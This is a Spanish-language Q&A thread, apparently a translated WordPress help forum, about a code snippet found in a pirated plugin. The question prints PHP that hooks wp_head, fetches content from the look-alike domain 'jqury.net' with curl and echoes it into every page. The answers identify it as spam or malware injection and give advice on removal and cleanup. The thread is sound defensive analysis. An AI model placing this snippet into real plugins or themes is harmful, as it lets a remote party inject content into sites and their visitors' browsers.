Encontré esto en un complemento. ¿Qué hace? ¿Es peligroso?

17

Encontré esto en un complemento. ¿Qué hace? ¿Es peligroso?

add_action('admin_enqueue_scripts', 'pw_load_scripts');
if (!function_exists('wp__head'){
function wp__head() {
    if(function_exists('curl_init')) { 
        $ch = curl_init();
        curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); 
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); 
        curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']);
        curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10); 
        $jquery = curl_exec($ch);  
        curl_close($ch); 
        echo "$jquery";
    }
}
add_action('wp_head', 'wp__head');
}
plugins wp-admin security curl Sofia Rose
fuente
55
¿Qué complemento es ese?
Daniel
¿Recibió el complemento del sitio oficial de WP?
Ese tipo brasileño el
1
Esto estaba en un complemento que uno de mis clientes quería que ejecutara en mi instalación de red. El complemento quería ejecutar esto en wp-admin. Después de leer esto, le pregunté de dónde venía. Es un complemento anulado de un torrent. La respuesta corta fue erm NO xXx
Sofia Rose

Respuestas:

16

Carga un bloque de marcado que contiene correo no deseado (pensé en publicar un poco de la fuente, pero no quiero anunciar el contenido de ninguna manera) desde un dominio que es un error ortográfico del dominio http://jquery.com/- utilizado por jQuery , una biblioteca de Javascript reconocida y popular y una que WordPress incluye en el Core. Creo que la idea es estar cargando esa biblioteca, cuando en realidad está cargando algo muy diferente.

Y de otras maneras está intentando parecer que está cargando jQuery. Observe el nombre de la variable $jquery.

También puede intentar cargar scripts maliciosos. No lo comprobé. Me gustaría sin duda llamaría peligroso, especialmente ya que el contenido de esa página se puede cambiar en cualquier momento el dominio controladores da la gana.

En el mejor de los casos, dañará su sitio ya que los motores de búsqueda desprecian los sitios que propagan el spam.

No lo uses No hace nada beneficioso para usted o para cualquier otra persona en la web que no sean las personas que administran el sitio. Si encontró esto en un sitio de buena reputación, infórmeselo.

s_ha_dum
fuente
7

Sí, es un código peligroso que carga contenido de un sitio de spam.

No nombró el complemento, pero si encontró este código después de que se haya instalado en su sitio web, es posible que el código del complemento no provenga del desarrollador de esta manera, sino que fue pirateado después de que se instaló. Si este es el caso, es posible que encuentre el código malicioso en más de su sitio web que solo este complemento.

Verifique el código del complemento descargado desde donde obtuvo el complemento originalmente y vea si este código malicioso estaba allí originalmente. Si no, entonces su sitio ha sido pirateado. Si determina que ese es el caso, lea este artículo del Codex .

Ben Miller - Restablece a Monica
fuente
3
Esto estaba en un complemento que uno de mis clientes quería que ejecutara en mi instalación de red. El complemento quería ejecutar esto en wp-admin. Después de leer esto, le pregunté de dónde venía. Es un complemento anulado de un torrent. La respuesta corta fue erm NO xXx
Sofia Rose